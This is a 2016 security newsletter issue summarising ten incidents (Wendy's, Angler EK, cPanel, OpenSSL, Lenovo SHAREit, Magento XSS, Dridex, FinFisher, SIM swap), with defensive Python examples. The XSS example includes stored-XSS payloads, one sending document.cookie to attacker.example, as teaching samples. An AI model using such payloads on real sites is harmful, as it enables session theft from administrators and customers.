Sunday, January 31, 2016

Issue 49 - Week of Jan 25th


1.       Wendy's investigates possible data breach: Wendy's is an American international fast food restaurant chain, like McDonald's and Burger King. Last week, Wendy's confirmed in a statement that it has launched a comprehensive investigation after learning of reports that fraudulent charges had occurred elsewhere on payment cards that were legitimately used at some of its restaurants. The Target breach probably still tops the list of PoS hacks; P.F. Chang's and Dairy Queen are other recent victims in the food business. EMV cards (chip-and-PIN) and contactless cards using NFC (Near Field Communication) or RFID, which do not require swiping, lower the value of whatever is scraped from a PoS terminal: the chip produces a per-transaction cryptogram, so captured data cannot be replayed to clone a working chip card, although it can still be abused for card-not-present fraud and the terminal's memory can still be scraped.

2.       Another Angler exploit kit victim: Last issue we discussed Officeholiday[.]com; on similar lines, a well-known European transport company's website was hacked and visitors were silently redirected to Angler EK, which exploited recent vulnerabilities in Adobe Flash Player to download and execute CryptoWall 4.0 ransomware. Angler EK remains one of the biggest threats: it tends to weaponise the newest Flash Player vulnerabilities and is seeded through high-profile, legitimate websites, so cautious browsing habits alone are no defence. It is important to keep software up to date, especially Adobe Flash Player, which is the weapon of choice for exploit-kit operators; disabling Flash, or setting it to click-to-play, removes that attack surface entirely.

3.       Bumper week for Ransomware: Apart from the transport company above, other big ransomware victims last week were the Israeli Electricity Authority and Lincolnshire County Council (UK). It also surfaced that attackers are using fake Salesforce notifications to lure users into clicking links or opening malicious attachments that lead to ransomware. On the mobile side, the Android ransomware Lockdroid was in the news, and a new family called 7ev3n was detected that demands 13 bitcoins, a marked deviation from the usual demand of about 1 bitcoin.

4.       Hackers launch cyberattack against cPanel systems: cPanel is a Texas-based company whose web hosting control panel is used on millions of sites. Last week the company said in a statement that one of its customer databases "may" have been breached. cPanel was able to "interrupt" the attack, so it is not known whether customer data was actually exfiltrated. The database held names, contact information and passwords. Fortunately for users, the passwords were stored salted and hashed rather than in the clear, which forces an attacker to brute-force each one individually, since the per-user salt defeats precomputed rainbow tables. All users of the service are nonetheless advised to change their passwords, and to change them anywhere else the same password was reused.
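To make the "salted and hashed" point concrete, the following is an added example written for this issue, not cPanel's code: it stores a password with PBKDF2-HMAC-SHA256 and a fresh random salt, verifies it in constant time, and contrasts that with a bare unsalted hash. The sample password and the record format (algorithm$iterations$salt$digest) are my own choices for the demonstration.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed sample credential for the demonstration (not real user data).
SAMPLE_PASSWORD = "correct horse battery staple"

# PBKDF2-HMAC-SHA256 parameters. The iteration count is what makes each
# guess expensive for an attacker; raise it as hardware gets faster.
PBKDF2_ITERATIONS = 200_000
SALT_BYTES = 16


def unsalted_hash(password: str) -> str:
    """The weak scheme: one fast hash, no salt.

    Every user with this password gets the same digest, so one rainbow
    table lookup or one cracked entry exposes all of them at once.
    """
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt_hex>$<digest_hex>'."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)  # fresh random salt per stored password
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
    )
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
        salt = bytes.fromhex(salt_hex)
        expected = bytes.fromhex(digest_hex)
        rounds = int(iterations)
    except ValueError:
        return False  # malformed record: never accept it
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return hmac.compare_digest(candidate, expected)


def demo() -> dict:
    """Two users with the same password: identical unsalted digests, distinct salted records."""
    alice = hash_password(SAMPLE_PASSWORD)
    bob = hash_password(SAMPLE_PASSWORD)
    return {
        "unsalted_identical": unsalted_hash(SAMPLE_PASSWORD) == unsalted_hash(SAMPLE_PASSWORD),
        "salted_identical": alice == bob,
        "alice_verifies": verify_password(SAMPLE_PASSWORD, alice),
        "wrong_password_rejected": verify_password("wrong", alice),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The salt is stored alongside the digest because it is not a secret; its job is to make every record a separate cracking job. An attacker who stole this table would still have to run 200,000 HMAC rounds per guess per user, which is the cost the cPanel notice was relying on.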

5.       Critical OpenSSL bug patched: OpenSSL is the most widely used open-source library for SSL/TLS in applications and websites. After the serious vulnerabilities found in it over the last few years, the library has come under heavy scrutiny from security researchers. The OpenSSL project has now released the promised patch for a high-severity vulnerability (CVE-2016-0701) in its Diffie-Hellman key exchange code: a server that reuses its DH private exponent across connections with a non-"safe" prime can leak that exponent to an attacker, who can then derive the session keys and decrypt HTTPS/TLS traffic. The fixed releases are 1.0.1r and 1.0.2f. The high-severity DH issue affects only the 1.0.2 branch, and 1.0.2f now uses a fresh DH key per connection by default; both releases also close a lower-severity SSLv2 cipher-negotiation issue (CVE-2015-3197). The older 1.0.0 and 0.9.8 branches are out of support and will not receive these fixes, so systems still on them need an upgrade rather than a patch.
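The first thing a practitioner wants after a release like this is a quick way to tell which hosts are still exposed. The script below is an added example for this issue, not an OpenSSL project tool: it parses the banner line printed by `openssl version` and decides whether the build is at or past 1.0.2f / 1.0.1r, treats the unsupported 1.0.0 and 0.9.8 branches as permanently unpatched, and accepts branches newer than 1.0.2 as post-dating the fix. The minimum-release table and the sample banners in the test are my own constructed inputs.

```python
import re
import subprocess

# Minimum patched release per supported branch after the January 2016 advisory.
# Branches absent from this table and older than 1.0.2 (1.0.0, 0.9.8) were
# already out of support and never received the fix.
PATCHED_RELEASES = {
    "1.0.2": "f",
    "1.0.1": "r",
}

# Matches e.g. "OpenSSL 1.0.2e 3 Dec 2015" or "OpenSSL 1.0.2k-fips 26 Jan 2017".
_VERSION_RE = re.compile(r"^OpenSSL\s+(\d+\.\d+\.\d+)([a-z]*)")


def parse_openssl_version(banner: str):
    """Split a banner into (branch, letter); None if it is not an OpenSSL banner."""
    match = _VERSION_RE.match(banner.strip())
    if not match:
        return None
    return match.group(1), match.group(2)


def _branch_tuple(branch: str):
    return tuple(int(part) for part in branch.split("."))


def openssl_is_patched(banner: str):
    """Return (patched, reason) for an `openssl version` banner line.

    Within a branch the letter suffix orders releases ('e' < 'f'); an absent
    suffix is the branch's first release and sorts before 'a'.
    """
    parsed = parse_openssl_version(banner)
    if parsed is None:
        return False, "not an OpenSSL banner (LibreSSL/BoringSSL have their own release lines)"
    branch, letter = parsed
    if _branch_tuple(branch) > (1, 0, 2):
        return True, f"branch {branch} was released after the January 2016 fixes"
    required = PATCHED_RELEASES.get(branch)
    if required is None:
        return False, f"branch {branch} is unsupported; no fixed release exists, upgrade the branch"
    if letter >= required:  # single-letter suffixes compare correctly as strings
        return True, f"{branch}{letter} includes the January 2016 fixes"
    return False, f"{branch}{letter} predates {branch}{required}; upgrade"


if __name__ == "__main__":
    # Run against the local binary. Distributions that backport fixes without
    # bumping the letter (Debian, RHEL) will show as unpatched here; check the
    # package changelog in that case rather than trusting the banner.
    try:
        banner = subprocess.run(
            ["openssl", "version"], capture_output=True, text=True, check=False
        ).stdout
    except FileNotFoundError:
        banner = ""
    patched, reason = openssl_is_patched(banner)
    print(("OK: " if patched else "ACTION NEEDED: ") + reason)
```

The banner check is a triage heuristic, not proof: a vendor build with backported fixes keeps the old letter, and a binary can be patched while a long-running daemon still has the old shared library mapped, so confirm with the package changelog and restart affected services.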

6.       Lenovo used third 'worst password' in file-sharing backdoor flaw: Recall the image we used in Issue 48: '12345678' is the third worst password, and Lenovo hardcoded it into its file-sharing software SHAREit, so the flaw could be exploited by anyone able to guess it. Researchers disclosed four vulnerabilities in Lenovo SHAREit, the worst of which is in SHAREit for Windows: when configured to receive files, it sets up a Wi-Fi hotspot protected by that hardcoded password, so any device with a Wi-Fi card in range could join the hotspot using '12345678' and reach the machine. The vulnerabilities were discovered and privately disclosed to Lenovo in October 2015 and were patched last week.

7.       Critical Flaws in Magento leave Millions of E-Commerce Sites at Risk: If you run an e-commerce site on Magento, update it now. Millions of online merchants are at risk of site takeover due to critical stored cross-site scripting (XSS) vulnerabilities in Magento; virtually all versions of both Community and Enterprise Edition are affected. The flaws are serious because a payload stored in a customer-controlled field executes later in an administrator's browser, letting an attacker take over the site, escalate privileges, siphon customer data and steal credit card information. The good news is that patches are available: an update was released after a security firm discovered and privately reported the issue to Magento.
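The stored-XSS pattern behind this item is worth seeing side by side with its fix. The following is an added example written for this issue in Python, not Magento's PHP code (Magento templates use their own block escaping helpers for the same purpose): it renders a constructed customer record into an admin table three ways, unescaped, escaped for text only, and escaped for the attribute context as well, and shows that the second is still exploitable. The two payloads and the `has_live_injection` check are my own constructed inputs.

```python
import html

# Constructed stored-XSS payloads of the kind a customer-controlled field
# (name, e-mail, address) would carry into an admin page. Not real traffic.
PAYLOAD_TEXT = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
PAYLOAD_ATTR = '" autofocus onfocus="alert(document.cookie)'


def render_vulnerable(customer_name: str, customer_email: str) -> str:
    """Interpolates stored values straight into markup: the bug class."""
    return (
        f"<tr><td>{customer_name}</td>"
        f'<td><input type="text" value="{customer_email}"></td></tr>'
    )


def render_text_escaped_only(customer_name: str, customer_email: str) -> str:
    """Escapes <, > and & but not quotes: enough for text nodes, not for attributes.

    The e-mail payload closes the value="..." attribute with its own quote and
    adds an event handler, so the admin page still executes attacker script.
    """
    return (
        f"<tr><td>{html.escape(customer_name, quote=False)}</td>"
        f'<td><input type="text" value="{html.escape(customer_email, quote=False)}"></td></tr>'
    )


def render_hardened(customer_name: str, customer_email: str) -> str:
    """Escapes for the context it writes into: quotes too, so an attribute cannot be closed early."""
    return (
        f"<tr><td>{html.escape(customer_name, quote=True)}</td>"
        f'<td><input type="text" value="{html.escape(customer_email, quote=True)}"></td></tr>'
    )


def has_live_injection(markup: str) -> bool:
    """Crude detector for the two constructed payloads escaping their context.

    A real scanner would parse the markup; here we only need to tell whether a
    raw <script> element or a live onfocus= attribute survived rendering.
    """
    return "<script>" in markup or 'onfocus="' in markup


if __name__ == "__main__":
    for name, renderer in [
        ("vulnerable", render_vulnerable),
        ("text-escaped only", render_text_escaped_only),
        ("hardened", render_hardened),
    ]:
        out = renderer(PAYLOAD_TEXT, PAYLOAD_ATTR)
        print(f"{name:18s} injection={has_live_injection(out)}  {out}")
```

The point to take away is that output encoding is context-sensitive: a value that is safe inside a text node is not automatically safe inside an attribute, a URL, or a script block, and a stored field will eventually be rendered in all of them somewhere in an admin panel.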

8.       Dridex Trojan targets UK banks, avoids two-factor authentication checks: The latest version of Dridex was first detected this month and is believed to be responsible for stealing up to £20 million from UK accounts. Dridex spreads through email phishing campaigns and can spy on victim PCs, with the overall aim of stealing credentials that give access to bank accounts. When the victim tries to access a targeted bank, the Trojan redirects the browser to a fake replica of the site and harvests the credentials entered there, including the one-time 2FA codes, which the attackers must relay to the real bank before they expire.

9.       FinFisher spyware linked to Indonesian government found in Sydney: FinFisher can remotely control any computer it infects, copy files, intercept Skype calls and log keystrokes. The suite is sold almost exclusively to government agencies. Last week an instance attributed to the Indonesian government was found hosted in an Australian data centre, meaning that data from users infected by an Indonesian department was being routed through Australia. In 2013 the Australian government was accused of spying on Indonesia, thanks to documents leaked by Edward Snowden. Now it looks like the Indonesians are taking revenge on the kangaroos.


10.   If your SIM stops working, check your bank account: A tech entrepreneur in Bangalore has joined the long list of victims of SIM-swap fraud. Criminals obtained a duplicate SIM card for the victim's number and siphoned off ₹45 lakh (≈$70k) between January 13 and January 18. A few days after his mobile phone stopped working, he went to the Reliance store to ask why and was told that a duplicate SIM had been issued: the criminals had obtained it from a Reliance store in Jayanagar by producing a copy of his Aadhaar card. The new SIM gave them his phone number, and with it whatever the bank sent to that number (typically the SMS one-time passwords that authorise transfers), which is how the money was moved. The lesson for users is that a phone that suddenly loses service is an incident, not an inconvenience: call the bank and the carrier straight away. Service providers should be far more careful in issuing duplicate SIMs; at minimum they should call or message the existing SIM before deactivating it, and treat a photocopied identity document as insufficient on its own.
